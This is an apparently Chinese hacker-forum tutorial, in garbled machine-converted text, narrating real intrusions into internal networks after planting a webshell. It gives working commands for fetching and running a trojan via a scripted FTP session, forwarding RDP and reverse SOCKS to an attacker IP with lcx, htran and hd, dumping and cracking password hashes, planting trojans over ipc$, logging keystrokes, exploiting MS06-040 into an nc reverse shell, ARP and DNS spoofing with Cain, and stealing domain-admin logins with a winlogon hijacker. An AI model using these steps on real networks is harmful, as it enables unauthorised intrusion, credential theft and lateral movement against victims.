常常在一些BBS里和一些雜志里看到,滲透滲出XX網(wǎng)站， 實在就是拿了扔了一個WEBSHELL在上面， 嚴格來說這根本算不上滲透滲出。 由于當你進了XX內網(wǎng)面臨N多的機器的時候， 才知道， 內網(wǎng)是多么的龐大。 下面我們先來看兩張內網(wǎng)的拓撲結構圖， 圖1， 圖2所示。 假如有的朋友現(xiàn)在還不了解路由器和交換機等什么意思， 那應該好好補習一下了。 這里在說一下什么叫內網(wǎng)， 可能有的朋友認192.168.1.x這樣的形式就是內網(wǎng)， 前段時間qq上一朋友掛出一臺機器， 告訴我有內網(wǎng)， 我問他怎么判定的， 他說執(zhí)行ipconfig /all的時候看見內網(wǎng)地址了， 實在這樣判定太過草率， 好比說我為了安全， 我自己買了一個路由器那么在我的電腦執(zhí)行ipconfig /all的時候IP地址也是內網(wǎng)， 實在我有內網(wǎng)嗎？是沒有的。

　　在滲透滲出內網(wǎng)之前我們先來了解一下局域網(wǎng)常見的拓撲結構， 網(wǎng)絡中的計算機等設備要實現(xiàn)互聯(lián)， 就需要以一定的結構方式進行連接， 這種連接方式就叫做"拓撲結構"， 通俗地講這些網(wǎng)絡設備如何連接在一起的。 目前常見的網(wǎng)絡拓撲結構主要有以下四大類：1、星型結構， 2、環(huán)型結構， 3、總線型結構， 4、星型和總線型結合的復合型結構。 由于文章是討論滲透滲出內網(wǎng)的， 所以每種的具體先容， 我就不列出來了， 大家簡樸了解下就可以了， 有愛好的可以每一種都百度下。

　　可能剛入門的朋友不是很了解為什么內網(wǎng)而我們還能訪問到呢， 現(xiàn)在良多服務器都是用了硬件防火墻作的映射， 也就是說他的所有服務器實在都在防火墻以后并且沒有外網(wǎng)IP， 可能有人會說， 沒有外網(wǎng)IP那我們訪問它網(wǎng)站用的IP是什么呢？假如使用硬件防火墻配置過這種環(huán)境過朋友就明白了， 這是現(xiàn)在良多包括海內至公司流行的NAT配置方法， 這樣相對來說比較安全， 這樣就需要我們在滲透滲出的時候做端口映射。

　　下面我把以前入侵滲透滲出的幾回內網(wǎng)過程并把一些思路， 一些高手們的滲透滲出經(jīng)驗， 和一些用到或沒用到的工具都綜合的說一下。 首先是通過腳本漏洞獲得了一個WEBSHELL， 服務器開的端口有21和80， 并沒有開過多的端口， 沒有裝SU， pcAnywhere等第三方軟件， wscript.shell為真， 上傳CMD能執(zhí)行一些簡樸的命令， 其他腳本木馬權限一樣， 這臺服務器上面就兩個站， 目錄權限不是很嚴， 發(fā)現(xiàn)D盤下有一個字符替代器， 如圖3所示。 直接把下回本地看看是什么東東， 原來是一個查找字符的工具， 如圖4所示。

　　難道這站以前讓人搞過， 治理員用來查找被改文件的， 試了一下可以改名， 如圖5， 那么好辦了， 我直接捆了一個木馬在上面， 把這個刪掉， 等著治理員上線吧， 等了兩天治理員仍是沒有上線， 這么等下去也不是辦法， 只好把首頁涂了， 告訴他網(wǎng)站有漏洞， 已被人植入木馬， 請查找木馬之類的， 并修改了幾個重要文件的時間， 果然治理員上線了。 如圖6。

　　執(zhí)行ipconfig /all果然有內網(wǎng)IP， 圖7。 既然沒開終端太不利便， 我直接幫它開了吧， 后來這臺機器我又做了VPN， 開3389可以用手工和工具都可以的， 這里帶給大家二個開3389的工具， 都還比較不錯， 一個是火狐的開3389的工具， 另一個是特南克斯， 這里我用的是特南克斯的， 至于怎么把程序傳到肉雞上辦法良多， 可以用遠程程序直接傳， 也可以在本機架FTP服務器， 用到20cn的FTP服務器， 圖8。 設置好用戶和密碼后cmdshell里執(zhí)行：

echo o 你架設FTP的IP>ftp.txt

echo hacklu>>ftp.txt　　　　　　　//寫入ftp.txt用戶名

echo 123456>>ftp.txt　　　　　　//寫入ftp.txt密碼

echo bin>>ftp.txt　　　　　　　//二進制方式轉輸

echo get 11.exe>>ftp.txt　　　//將11.exe下載到肉雞

echo bye>>ftp.txt　　　　　　//斷開FTP

type ftp.txt　　　　　　　　//查看寫入是否有錯誤　

ftp -s:ftp.txt              //執(zhí)行FTP.TXT里的內容

del ftp.txt　　　　　　    //刪除ftp.txt

這樣我們就可以把11.exe下載到肉雞運行就可以了， 也可以用0803期雜志提到的VBS工具， 適合不超過300KB的程序。 把EXE轉成BAT在上傳， 工具運行好會自動判定是2000系統(tǒng)或者2003系統(tǒng)， 2000系統(tǒng)則自己重啟， 也可以自定義終端端口， 運行結果如圖9所示。

　　在執(zhí)行netstat -an發(fā)現(xiàn)3389開放， 當然這樣直接連是連接不上的， 由于我們外界是無法直接訪問到內部機器的， 但可以讓內網(wǎng)機器來訪問我們， 好比現(xiàn)在流行的反彈木馬， 這樣就需要我們做端口映射， 說到端口映射工具當然代表作就是LCX寫的工具了， 首先在本機執(zhí)行l(wèi)cx -listen 99 9833， 在肉雞上執(zhí)行l(wèi)cx -slave 123.114.120.115 127.0.0.1 99 3389， 意思是在本機監(jiān)聽99和9833端口， 把99端口數(shù)據(jù)轉到9833上面， 然后把肉雞的3389端口數(shù)據(jù)轉到本機的99端口上， 然后就可以拿連接器連接本地的9833端口了， 如圖10所示。

　　而希奇的是這次卻沒有連上， 那就用下教主的高級內網(wǎng)滲透滲出工具Paris， 工具其他功能未幾說了， 只說下端口映射的功能， 傳msxidc和vVXDc.dll到目標內網(wǎng)機器， 在目標機器執(zhí)行：msxidc -l127.0.0.1 -p3389 -m82 -s61.149.230.28 -r22， 在自己機器或者有公網(wǎng)IP的肉雞：MAPServer.EXE -p22， 這時候只要連接本機的或者公網(wǎng)IP肉雞的22端口就可以了， 在說一款比較不錯的工具， htran.exe， 能開啟Socks5服務， 但我們只說端口映射， 命令：在公網(wǎng)肉雞監(jiān)聽(臨聽任意兩個端口):htran -p -listen 119 120， 在內網(wǎng)的機器執(zhí)行：htran -p -slave 公網(wǎng)肉雞IP 119 127.0.0.1 3389， 這樣是把這個內網(wǎng)肉雞的3389轉發(fā)到公網(wǎng)肉雞或者自己機器的119端口上， 然后再用3389登陸器連接公網(wǎng)肉雞的120端口。 或者連接本機的120端口， 如圖11所示。 這幾款工具各有上風， 大家在滲透滲出的時候根據(jù)需要自己選擇吧。

   端口映射大家在滲透滲出的時候可能已經(jīng)不少朋友用過了， 但很少看到有人是直接反彈代辦代理來連接， 反彈socks代辦代理好處是我們直接可以連接內網(wǎng)的其它機器， 而不需要在去轉端口。 最近“凋凌玫瑰”寫了一個內網(wǎng)滲透滲出利器---hd， 使用方法如下， 首先在本機監(jiān)聽：

c:\>hd -s -listen 53 1180

[+] Listening ConnectBack Port 53 ......

[+] Listen OK!

[+] Listening Socks5 Agent Port 1180 ......

[+] Listen2 OK!

[+] Waiting for MainSocket on port:53 ......

此命令是將連接進來的53端口的數(shù)據(jù)包連接到1180端口。

在對方機器上運行:

C:\RECYCLER>hd -s -connect x.x.x.x 53

[+] MainSocket Connect to x.x.x.x:53 Success!

[+] Send Main Command ok!

[+] Recv Main Command ok!

[+] Send Main Command again ok!

上面的x.x.x.x為你的外網(wǎng)ip， 這時我們接收到反彈歸來的代辦代理顯示的情況。 如圖12。 然后在本機設置sockscap， 設置在控制臺的”文件”-“設置”里， 控制臺可以將你需要代辦代理的程序放在上面， 直接拖進去即可， 控制臺機的程序就可以進接連接內網(wǎng)的機器了。 如直接用mstsc連接內網(wǎng)其它機器的3389， 就可以上去登錄治理。 如圖13,14所示。

　　進了3389后我們第一步需要干什么？可能良多朋友都是留后門， 像什么上帝之門、SHIFT后門， 記實3389帳號等等。 當然留什么后門好不在本文討論之中。 我個人比較喜歡抓HASH(哈希),一般是pwdump+lc5， 一般我破解的時候數(shù)字加字母的10位組合在3個小時左右就可以破得出來， 而且現(xiàn)在還有破解HASH的彩虹表， 不外體積是很龐大的， 在有前段時間在網(wǎng)上看見一篇文章， 文章名字是“卸載補丁去除保護 獲取Windows 2003密碼”， 大致意思是卸載Windows2003 SP1/SP2， 由于windows 2003 +SP0才可以利用findpass從winlogin進程中抓出系統(tǒng)賬號明文密碼， 抓出密碼在重安裝上補丁。 我個人沒有實驗過， 此方法很暴力， 我個人也不推薦這么做， 很輕易被發(fā)現(xiàn)的。

　　那什么是HASH呢？Hash簡樸點講就是把任意一段數(shù)據(jù)經(jīng)由某種算法天生一段獨一的固定長度的數(shù)據(jù)。 Hash， 一般翻譯做"散列"， 也有直接音譯為"哈希"的， 通過散列算法， 變換成固定長度的輸出， 該輸出就是散列值。 HASH主要用于信息安全領域中加密算法， 他把一些不同長度的信息轉化成雜亂的128位的編碼里,叫做HASH值. 也可以說， hash就是找到一種數(shù)據(jù)內容和數(shù)據(jù)存放地址之間的映射關系。 對于哈希菜鳥也可以這么理解， 即保留電腦上治理員登錄的一種加密后的密碼， 至于什么具體加密算法， 有愛好的朋友可以百度下， 例如我這里用的是SAMInside抓HASH， 程序打開后我們選擇小人這里， 點擊使用LSASS輸入本地用戶， 如圖15。 這樣計算機的用戶名和HASH值就會泛起在列表里， 如圖16。

　　直接點右上方的開始就可以破解密碼了， 圖17所示， 也可以導出用LC5破解， 在選擇－－文件－－輸出用戶到PWDUMP， 這樣把HASH保留為文件文件， 圖18。 也可以用PWDUMP抓， 如圖19， 最后我們把內容復制下來保留文本文件用LC5破解， LC5的安裝非常的簡樸， 一直下一步即可。 程序自己帶注冊機， 我們在注冊一下， 完事后我們在程序主頁面導入剛才保留的hash.txt， 點擊導入按鈕（第六個）， 在選擇從PWDUMP文件， 用戶列表就會顯示出來了， 在點擊開始就可以破解了， 如圖20,21所示。

　　而對于2000的系統(tǒng)我們直接可以用MT讀出密碼， 直接運行mt -findpass,如圖22所示， 為什么要破解本秘要碼， 由于在內網(wǎng)滲透滲出的過程中抓出一臺治理員的密碼是很重要的， 現(xiàn)在我們有了內網(wǎng)一臺機器了， 當然要繼承滲透滲出下去， 在這里我總結一下幾種方法， 方法一、掃描弱口令， ipc$連接。 方法二、靠自己的命運運限和治理員的懶惰加社會工程學。 方法三、溢出。 方法四、arp欺騙， DNS欺騙。 方法五、域結構下的滲透滲出。 這里簡樸的總結五方面， 但是每一方面詳細利用起來又包括很細節(jié)在里面。

方法一、掃描弱口令， ipc$連接。

　　可以用XScan-v3.3掃描器掃一下內網(wǎng)， 設置好IP和端口， 端口設置可以查看本機裝有什么軟件， 例如本機裝有radmin， pcAnywhere等等， 那我們就掃描4899,5631等端口， 如圖23， 然后用本機的知道的密碼去連接。 當然假如改成別的端口我們根據(jù)情況轉換一下， 有的時候在外網(wǎng)的機器很堅固， 到了內網(wǎng)的時候就很脆弱了。 當然現(xiàn)在機器已經(jīng)很少弱口令了， 但是我們有本機治理員帳戶和密碼， 治理員為了利便往往都設置成一樣的， 由于做系統(tǒng)的時候做完一臺直接GHOST別的系統(tǒng)。 而ipc$連接可以是說長短常古老和經(jīng)典的。

IPC 是Internet Process Connection的縮寫， 也就是遠程網(wǎng)絡連接。 WindowsNT/2000/XP/2003默認都提供了IPC$管道連接， 就是在兩個計算機進程之間建立通訊連接。 打個比方， IPC連接就像是挖好的隧道， 程序可通過隧道訪問遠程主機。 默認情況下， IPC是共享的， 也就是說微軟已經(jīng)為我們挖好了這個隧道（IPC）， 因此， 這種基于IPC的入侵也經(jīng)常被簡稱為IPC入侵。 IPC 后面的$是共享的意思， 不外是躲藏的共享， 微軟系統(tǒng)頂用“$”表示躲藏的共享， 好比C$就是躲藏的共享C盤。 也就是說C盤是共享的。 ipc$連接這個只能說是治理員開的共享， 嚴格來說不能算一個漏洞， 目標主機還需知足兩個前提：1、目標主機開啟了ipc$共享 ；2、擁有目標主機的治理員帳號和密碼 。 當年在2000系統(tǒng)的時候ipc$入侵可以說是風扉一時。

　　這里我用兩臺XP做演示， 打開命令提示符在CMD下輸入：net use \\IP\ipc$ "password" /user:"username" 建立非空連接， 接著copy \路徑\*.exe \\IP\共享目錄名， 向遠程主機復制文件， 接著net time \\IP， 查看遠程主機確當前時間， 圖24所示， 接著就可以用計劃任務運行我們COPY過去的程序了， 執(zhí)行at \\ip 時間 程序名， 遠程添加計劃任務， 圖25所示。 可以按照我們劃定的時間內運行程序， 假如對方禁止了計劃任務， 默認是開啟的， 我們可以把文件復制到對方啟動目錄， 先執(zhí)行net use z: \\IP\c$， 是把對方C盤映射到本機Z盤上， 這樣我們直接將木馬放在啟動目錄， 如圖26所示。 等復制完了想斷開了可以用命令， net use z: /del /y， 這樣可以刪除映射的z盤 假如有朋友也手工輸入命令麻煩， 也可以用20CN的IPC掃描器， 可以同步植入木馬。 如圖27所示。 在域控的環(huán)境中， 我們只要得到域控密碼就可以直接用ipc連接治理員機器種馬。 后面會先容域環(huán)境下的滲透滲出。

方法二、靠自己的命運運限和治理員的懶惰加社會工程學。 （推薦非安全出的黑客社會工程學攻擊一書）

　　這里所說的命運運限是剛才說過的， 好比說治理員為了利便設置“密碼一卡通”掃描內網(wǎng)開3389端口的機器， 用破出來的本秘要碼連接所有開3389的機器， 我曾經(jīng)入侵一個臺灣的內網(wǎng)就是密碼都是一樣的， 或者可以在本機裝上鍵盤記實， 安裝鍵盤記實的目地不光是記實本秘要碼， 是記實治理員一切的密碼， 好比說信箱， WEB網(wǎng)頁密碼等等， 這樣也可以得到治理員的良多信息。

　　這里我用的是鍵盤記實巨匠， 首先運行keyboardlog.exe， 然后點"開起監(jiān)控"， 留意這個程序只要運行一次就可以了， 以后開機的時候自動運行。 程序運行后如圖28的界面， 我們點擊開始監(jiān)控就可以了。 這個工具可以記實中文， 這點對于有些機器仍是不錯的， 記實的文件可以設置， 方法為修改config.ini里的文件. 格局為如 c:\1111.txt,然后再運行keyboardlog.exe,點擊休止監(jiān)控， 然后再重新點開始監(jiān)控。 如圖29是記實到的內容。 至于記實的什么內容就要靠大家去分析然后配合社會工程學了。

方法三、內網(wǎng)溢出。

　　溢出從技術角度可以分為堆溢出和棧溢出， 這點我們先不說， 從另一個角度則分為遠程（remote）溢出和本地（local）溢出， 遠程溢出也就是通過對方的一些網(wǎng)絡上的服務對我們提交的的數(shù)據(jù)沒有嚴格的檢查， 我們提交一些精心構造的數(shù)據(jù)， 可以迫使對方的主機執(zhí)行我們指定的動作：好比添加用戶， 打開端口， 反彈一個SHELL給我們等等。

　　這種方法放在現(xiàn)在來說可以說是成功率很低的， 由于現(xiàn)在基本都是自己打補丁了， 假如在向撤退退卻個二三年仍是可以的， 但并不代表沒有一點不可能， 06的時候朽木在騰訊內網(wǎng)的時候就是靠嗅域治理員的哈希和MS06035溢出其他的機器， 對于比較火的05年的MS05039,06年的MS06035、06040， 07年DNS溢出等等， 這就需要我們多關注一下“http://www.microsoft.com/china/technet/Security/current.mspx”微軟漏洞發(fā)布的地方， 當然內網(wǎng)溢出不一定非得靠系統(tǒng)漏洞， 可以查看本機裝有那些第三方程序， 然后溢出其他機器的， 這里我以06040+2000系統(tǒng)為例， 首先我們用Superscan3.0掃描內網(wǎng)開放445端口， 如30所示。

　　在本機用NC監(jiān)聽1234端口， 執(zhí)行nc -l -v -p 1234， 如圖31， 然后用另一個CMD窗口執(zhí)行， ms06040rpc 對方IP 本機IP 1234 1， 這樣用NC監(jiān)聽的端口會返回了對方的CMDSHELL， 如圖32、33所示。 在得到CMDSHELL之后， 是添加用戶或者給機器中木馬， 就看見大家興趣了。 另外也可以用去年比較火的DNS溢出， DNS服務一般開放53端口。 DNS服務器在有的時候就是域服務器， 關于域環(huán)境下參考方法五。

方法四、arp欺騙， DNS欺騙。

　　這個方法是比較實用， 所以多先容一下。 但同是也是比較輕易暴露自己的， 不少同行在C段方面和內網(wǎng)方面用的都是ARP欺騙， 不少菜菜可能還記得雜志常常看到嗅探的時候用到的ARP欺騙， 我們再來溫習一下吧。 首先在內網(wǎng)機器輸入arp -a， 如圖34所示。 這里第一列顯示的是ip地址， 第二列顯示的是和ip地址對應的網(wǎng)絡接口卡的硬件地址（MAC）， 第三列是該ip和mac的對應關系類型。 可見， arp是一種將ip轉化成以ip對應的網(wǎng)卡的物理地址的一種協(xié)議， 或者說arp協(xié)議是一種將ip地址轉化成MAC地址的一種協(xié)議。 它靠維持在內存中保留的一張表來使ip得以在網(wǎng)絡上被目標機器應答。

1、什么是MAC地址、MAC地址也叫物理地址， 硬件地址或鏈路地址， 同網(wǎng)絡設備制造商出產時寫在硬件內部。 IP地址與MAC地址在計算機里都是以二進制表示的。 IP地址是32位的， 而MAC地址則是48位的。 MAC地址的長度為48位（6個字節(jié)）， 通常表示為12個16進制數(shù)， 每2個16進制之間用冒號隔開， 如08:00:20:0A:8C:6D就是一個MAC地址， 其中前3位16進制數(shù)08:00:20代表網(wǎng)絡硬件制造商的編號， 它由IEEE（電子與電子工程師協(xié)會）分配， 而后3位16進制數(shù)0A:8C:6D代表該制造商所制造的某個網(wǎng)絡產品（如網(wǎng)卡）的系列號。 輸入ipconfig /all就可以看見本機的MAC地址。

2、什么是ARP， 大家都知道計算機通訊是要有IP地址的吧！可是在局域網(wǎng)中， 計算機之間的通訊是只靠MAC地址來發(fā)送數(shù)據(jù)的。 ARP是一種協(xié)議， 用來實現(xiàn)IP地址到MAC地址的轉換， 假設192.168.1.1要發(fā)一個數(shù)據(jù)給192.168.1.101， 它就會發(fā)出arp廣播包問：“誰是192.168.1.101？我要你的MAC地址！”這時候192.168.1.101會回答：“我是192.168.1.101， 我的MAC是AA-AA-AA-AA-AA-AA。 ”然后192.168.1.1就會把這個回答記實下來， 然后再發(fā)數(shù)據(jù)給192.168.1.101的時候就直接構造目地地址為AA-AA-AA-AA-AA-AA的數(shù)據(jù)包發(fā)送。

3、什么是ARP欺騙、經(jīng)由剛才的ARP查詢的過程我們知道， 在詢問的過程中， 國為不知道到底誰才是192.168.1.101， 所以192.168.1.1發(fā)出的是廣播包來詢問， 其它的電話固然也收到了這個包但是并不回答。 如果現(xiàn)在有個人， 192.168.1.102居心不良， 想冒充192.168.1.101， 他也可以給192.168.1.1發(fā)一個回答的數(shù)據(jù)包說：“我才是192.168.1.101， 我的MAC地址是BB-BB-BB-BB-BB。 ”那么192.168.1.1就會把原先的那條記實從MAC地址表中刪除掉， 寫入新的這個地址對應關系， 這就是arp欺騙。

4、什么是網(wǎng)關、在局域網(wǎng)中， 所有的電腦可能是共用一個網(wǎng)絡出口， 這個出口就是網(wǎng)關了。 網(wǎng)關可以是一臺電腦， 也可以是一個路由器的某個接口， 它一樣有自己的IP地址， 局域網(wǎng)中所有的要發(fā)到外部的數(shù)據(jù)包都直接遞交給網(wǎng)關， 網(wǎng)關負責將這個數(shù)據(jù)包傳遞到遠程網(wǎng)絡， 再將外界返回的數(shù)據(jù)分發(fā)給局域網(wǎng)中的指定電腦。

  　TCP/IP協(xié)議是如斯的脆弱， ARP協(xié)議在設計確當初并沒有充分的考慮到安全題目， 所以今天才泛起N多的arp欺騙工具， 在先容工具之前， 我們再來談談服務器在機房中的情況。 一般而言， 現(xiàn)在流行的的主機托管方式置放的服務器是和良多別的服務器放在一個機柜上， 大家共用一個交換機共享100M的帶寬， 這樣就造成了一個題目， 那些沒有做端口隔離的的機房（絕大多數(shù)機房都是這樣的）每個交換機下的所有服務器構成一個局域網(wǎng)。 在這個局域網(wǎng)下， 大家就可以玩arp欺騙了。

　　說到arp嗅探的工具要先提一下有一定的位置的cain， 官方最新版為4.918， 我們先要進行安裝， 如圖35所示。 直接NEXT下一步就可以了， 安裝好我們運行CAIN， 點擊Sniffer， 在選擇工具欄第二個按鈕， 在點擊十字架， 在彈出對話框中我們選擇子網(wǎng)中所有計算機， 如圖36所示。

　　在Configure選項里我們可以根據(jù)需要選擇端口， 如21、80、3389等。 如圖37所示。 這時在選擇下面的arp， 十字按鈕是灰色的， 我們點擊一下空缺處， 在選擇十字按鈕， 在彈出的對話框里左邊選擇網(wǎng)關， 右邊選擇欺騙的IP。 最后點開始嗅探， 上面第二個按鈕。 如圖38所示。 這樣就能嗅到數(shù)據(jù)了， 圖39是嗅到的HTTP密碼。 另外假如嗅到了3389密碼我們在上面打開文檔， 在里面可以找到密碼， 如圖40所示。

　　大家在用CAIN嗅探的時候可能碰到過這樣的情況， 數(shù)據(jù)一大就當機了， 過了很少時間都連不上了， 所以這時候就需要我們盡可能把不需要嗅探的端口都去掉。 這樣會大大的減少當機的可能性。 假如看到丟包率超過10%就要留意啦， 趕快停掉， 看看那里沒設置好吧。 另外提供一個“chong”寫的BAT程序， 在開嗅的時候運行它就可以了。

======start=========

:ping

ping g.cn

IF ERRORLEVEL   1 GOTO reboot

IF ERRORLEVEL   0 GOTO ping

:reboot

iisreset /reboot

======end=========

這里的g.cn你可以設置為網(wǎng)關的IP或你的IP

假如能ping通的話就繼承ping 假如不通的話就以為當機了 （事先自己先測試下）。

　　在說下DSN欺騙， 我們看下DNS是怎樣工作的， DNS是全稱是Domain Name Server， 既域名服務器。 當一臺主機發(fā)送一個哀求要求解析某個域名時， 他會首先把解析哀求發(fā)到自己的DNS服務器上。 假如內網(wǎng)里的192.168.1.101要訪問百度www.baidu.com， 但不知道其IP地址， 這時192.168.1.101主機詢問網(wǎng)關192.168.1.1， www.baidu.com的IP是多少， 假如這時候我們將冒充網(wǎng)關192.168.1.1返回給192.168.1.101他一個特定的含有網(wǎng)頁木馬的IP， 這樣就實現(xiàn)了DNS域名欺騙。

　　首先用前面的先容的列出內網(wǎng)機器， 然后在ARP里選擇arp-DNS， 點擊空缺處激活十字按鈕， 彈出一個DNS欺騙對話框， 在哀求DNS域名欄中填入對方要訪問的網(wǎng)站， 如www.baidu.com， 然后在用來改寫響應的IP地欄， 如圖41所示。 而我們響應的地址可以是一個網(wǎng)頁木馬的地址， 這里我以網(wǎng)關為例， 也就是說192.168.1.101訪問www.baidu.com的時候會轉向192.168.1.1的頁面， 我們先來訪問一下192.168.1.1， 如圖42所示， 我們在192.168.1.104的機器上裝CAIN開始DSN欺騙后訪問百度網(wǎng)頁， 如圖43所示。 是不是也和192.168.1.1一樣了， 假如我們在本架設一個HTTP服務器， 掛上一個網(wǎng)馬后， 就能欺騙訪問者了， 當然假如想做的更像， 可以制作一個和欺騙主頁一樣的頁面。

方法五、域結構下的滲透滲出。

　　在入侵域結構內網(wǎng)之前我們先來了解一下什么是域， 可能大家對工作組比較認識了， 而域和工作組是不一樣的， 工作組是一群計算機的集合， 它僅僅是一個邏輯的集合， 各自計算機仍是各自治理的， 你要訪問其中的計算機， 仍是要到被訪問計算機上來實現(xiàn)用戶驗證的。 而域不同， 域是一個有安全邊界的計算機集合， 在統(tǒng)一個域中的計算機彼此之間已經(jīng)建立了信任關系， 在域內訪問其他機器， 不再需要被訪問機器的許可了。 也就是域用戶登錄， 超級大的權限。 而域還可以擴展， 像域樹， 域林。 在一個網(wǎng)絡中既可以有多個多級子域、域樹， 還可以有多個林。

   為了大家好理解， 我這里舉個例子， 例如一個內網(wǎng)是一個大樓， 而每層的每個房間是一臺計算機， 當然每個房間的鑰匙只有房間的主人才擁有， 但大樓建立一個保安室， 而這保安室為了治理利便有一把可以打開任意房間的鑰匙。 前題是這個房間答應加入保安的治理范圍內， 這個保安室就是域控制器， 當然在形象的說大樓可以是10層， 而每一層都有一個保安室， 也可以有一個總的保安室。 當然在往大的說也可以有良多大樓， 大樓與大樓之間為了利便也可以建立共享。 如流動目錄的域， 流動目錄可以貫串一個或多個域。 在獨立的計算機上， 域即指計算機本身， 一個域可以分布在多個物理位置上， 同時一個物理位置又可以劃分不同網(wǎng)段為不同的域， 每個域都有自己的安全策略以及它與其他域的信任關系。 當多個域通過信任關系連接起來之后， 流動目錄可以被多個信任域域共享。 在往回說每臺機器像一個樹葉， 而我們控制了樹葉， 還想控制樹杈， 而最后還想控制這個大樹， 這時候就到域根了。 而一棵樹是在一片森林當中的。

　　在入侵內網(wǎng)的時候， 一般先用net view查看內網(wǎng)的情況， 列出共享的域、計算機或資源的列表。 如圖44所示。 如何判定有沒有域呢， 實在一個ipconfig /all基本就看出來了， 大家在回到圖7當中， 留意一下第二項， 也就是Primary Dns Suffix這項， 從這個命令我們可以得知， 存在一個域xxxx-cc.com， 我們ping一下域xxxx-cc.com， 得到域服務器的ip。 如圖45所示。 或者用命令net config workstation， 會顯示本機計算機名和治理員用戶名， 工作站的域DNS名稱及登錄到的域， 如圖46所示。

　　接著執(zhí)行net localgroup administrators來看一下本機在域里面的角色， 如圖47所示。 看來只是一個普通域用戶。 我們再來查看一下域里面有多少的用戶， 執(zhí)行net user /domain， 域里面的用戶良多， 如圖48所示。 域里面這么多用戶， 那么我們再查看一下域治理員有哪些， 執(zhí)行net group "domain admins" /domain， 貌似只有一個域治理員。 如圖49所示。

　　大家知道在域治理網(wǎng)絡中只要搞定了域治理員內網(wǎng)一切機器都OK了， 現(xiàn)在域服務器有了， 域治理員有了。 思路呢？可以用上面的幾種方法來入侵域服務器， 如arp嗅探域服務器， 而域治理器在良多時候也是DNS服務器， 也可以嘗試DNS溢出等。 這里我為大家推薦一個Winlogon劫持記實3389密碼小工具， 原作者為“lovemfc”， 我們用這個不是記實本機登錄的3389密碼， 當然本機也是可以記實的， 更不錯的是可以記實域治理員登錄本機的密碼， 由于域治理員是有權限登錄下面每臺用戶的機器的。 缺點是記實密碼的東西只能保留本機上， 而ASM根據(jù)這個寫了一個發(fā)信版的天生器， 這就利便我們大家了， 程序運行后如圖50。

　選擇好接受的ASP地址后， 天生出來CreateServer.exe， 直接在服務器上運行即可， post.asp會在你的URL地址下天生key.txt。 合用范圍2003系統(tǒng)， 圖51是我記實到本機治理員和域治理員的密碼， 這下就可以縱橫整個內網(wǎng)了。 在服務器上掃描開放3389端口的， 用域治理員登錄全部OK， 在域控的環(huán)境中， 我們只要得到域控密碼也可以直接用ipc連接治理員機器種馬。 最后登錄內網(wǎng)幾臺機器抓圖紀念一下， 如圖52。

　　最后說一下本文章只做菜鳥滲透滲出入門文章， 當然內網(wǎng)滲透滲出還有其他深入的技巧， 如主動會話劫持等， 因本人時間和水平都有限， 文章中不足之處歡迎大家批評指正。 菜菜朋友們在文章中如有題目聯(lián)系我可以去非安全官方網(wǎng)站， ID：櫻花浪子。